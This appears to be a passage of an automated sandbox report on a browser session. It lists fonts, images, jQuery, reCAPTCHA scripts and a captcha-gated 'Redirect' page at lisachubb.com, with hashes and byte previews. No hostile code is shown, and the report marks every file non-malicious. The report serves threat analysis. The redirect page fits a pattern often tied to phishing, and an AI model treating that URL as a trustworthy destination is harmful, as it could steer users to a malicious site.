                                                      SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                      SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15340, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):15340
                                                      Entropy (8bit):7.983406336508752
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:19B7A0ADFDD4F808B53AF7E2CE2AD4E5
                                                      SHA1:81D5D4C7B5035AD10CCE63CF7100295E0C51FDDA
                                                      SHA-256:C912A9CE0C3122D4B2B29AD26BFE06B0390D1A5BDAA5D6128692C0BEFD1DFBBD
                                                      SHA-512:49DA16000687AC81FC4CA9E9112BDCA850BB9F32E0AF2FE751ABC57A8E9C3382451B50998CEB9DE56FC4196F1DC7EF46BBA47933FC47EB4538124870B7630036
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2
                                                      Preview:wOF2......;........d..;..........................d..z..J.`..L.Z..<.....\..`..^...x.6.$..6. ..|. ..8..z%......Q.{..q...FF.kd .8.(..d..).!C...Y.JA...r. ..GH8F......nW...".2&....2<..+C...p...b..SC.......J......z.-..Q..#6&1zUe../\...l.....<.....9s...E~.]B-..B.wY..o......Q..*A.F..1j.......-.`P% .. ,..@1.0..~.....WWW.d.u<c{..^.R.+..w....&.........A......+C....(.N.....0.~..0.J.;.Nu..7....]..m.H.....[h.GL3....?)....c.H...2.3.}y........SXI|..iVN'%E.D.W....r..<`....i....6;E$.....U.$j.@...._.......R2....WS...k.vz.R.'a9!^..*.N....h.._.....c.%."..S.2.16B...o.2}.pmU[.|.LI....2.....OWQLO1-....s..8.(...".|6...6R.. ..M-.zO.}w)..v..mXxX...c..3*#.+.v....F`.Z;.zQ.......r,....Yo.....g.h....+.....O.3Y..)Y.8.!....elX......._.3.}k~u.{ C..H.z..FP........@...d..)T.R...L.H.J.j.@..............$...E......y...3.b...I.h u.+%.HA.\..9..8..X.!....gx...].:..V..C...._..X..!....6..)...GM:E.....O.Z.*}k.;.T.k..D.k.O..D5.r..."......?..T.Q.A...CF...3g.5.Dn<.QPy..G..1.9..Q..0..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):2529
                                                      Entropy (8bit):5.033240050231006
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6798C0A6B8F2890E24E831ED68F5EE43
                                                      SHA1:F24447027BB83B7CCDB6B3871A3536E04187835A
                                                      SHA-256:17576C38E550862EAF08B14550BE1E5D1A0D1F2B58490D6568DA084EC6E98583
                                                      SHA-512:FB68D0B66E7312E6E0A03268854504825A37655641F3C22E01A69E6CE0A880EBCB8B7FB7E1D4E10A3865978E35B93F199A100E730464E236013C3F79917EEB47
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lisachubb.com/jsuhsks/
                                                      Preview:<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Redirect</title>.. <script src='https://www.google.com/recaptcha/api.js' async defer></script>....</head>..<style>.. .loader {.. border: 6px solid #f3f3f3; /* Light grey */.. border-top: 6px solid #3498db; /* Blue */.. border-radius: 50%;.. width: 30px;.. height: 30px;.. animation: spin 1s linear infinite;.. display: none;..}....@keyframes spin {.. 0% { transform: rotate(0deg); }.. 100% { transform: rotate(360deg); }..}..</style>..<body>.. <div>.. <div style="display: flex; justify-content: center; align-items: center; margin-top: 30px;" id="captcha">.. <div>.. <div class="g-recaptcha" data-sitekey="6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU"></div>.. <div id="g-recaptcha-error" style="height: 20px; font-size: 12px; margin-top: 5px;" ></div>.. <div style="text-align: center;"><
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2228
                                                      Entropy (8bit):7.82817506159911
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EF9941290C50CD3866E2BA6B793F010D
                                                      SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                      SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                      SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1483), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):1483
                                                      Entropy (8bit):5.7875563041545055
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:706565706AA6D0458E9700A72BD5F5CA
                                                      SHA1:5B836D6D834C0966C582D32225A723B95B789119
                                                      SHA-256:19280E7EDFECD26A62EF9E7E88235DA48077622ADF4F9AD6EA9738CB01D0A60D
                                                      SHA-512:3EF6701A97EC35D42253C61D2F24414CEE91C69ABB7764DB9E16CC0428907E7EDF1670A339F6581B2923585B8FBBE2B6B4321E1903E1E041E6FEBA9507094019
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.google.com/recaptcha/api.js
                                                      Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A7vZI3v+Gz7JfuRolKNM4Aff6zaGuT7X0mf3wtoZTnKv6497cVMnhy03KDqX7kBz/q/iidW7srW31oQbBt4VhgoAAACUeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJEaXNhYmxlVGhpcmRQYXJ0eVN0b3JhZ2VQYXJ0aXRpb25pbmczIiwiZXhwaXJ5IjoxNzU3OTgwODAwLCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ==';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='tre
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):530
                                                      Entropy (8bit):7.2576396280117494
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                      SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                      SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                      SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/api2/audio_2x.png
                                                      Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):937
                                                      Entropy (8bit):7.737931820487441
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FC3B7BBE7970F47579127561139060E2
                                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:downloaded
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):102
                                                      Entropy (8bit):4.831369400999319
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E8FEA68FC4F3BAD81518A42FF35F72A9
                                                      SHA1:2C32B99F6C1675CC7F0ED5C0C323C5192726D558
                                                      SHA-256:B67733509D82D3AA189D99FA0FA466B48B82265B9A701CB150410CBF35F55AAB
                                                      SHA-512:75F295EC1AAEC9C754665E3D73DFDE9B725C4FD237E2A2DE83A693069B4C03F1FCD6DB9CD692D610F517531E582CAEB87AF9E1C9AFC0DD32E59FEAEDBED913F8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb
                                                      Preview:importScripts('https://www.gstatic.com/recaptcha/releases/hbAq-YhJxOnlU-7cpgBoAJHb/recaptcha__en.js');
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):15552
                                                      Entropy (8bit):7.983966851275127
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                      SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                      SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                      SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                      Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):15344
                                                      Entropy (8bit):7.984625225844861
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                      SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                      SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                      SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                      Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text
                                                      Category:downloaded
                                                      Size (bytes):315
                                                      Entropy (8bit):5.0572271090563765
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lisachubb.com/favicon.ico
                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                      No static file info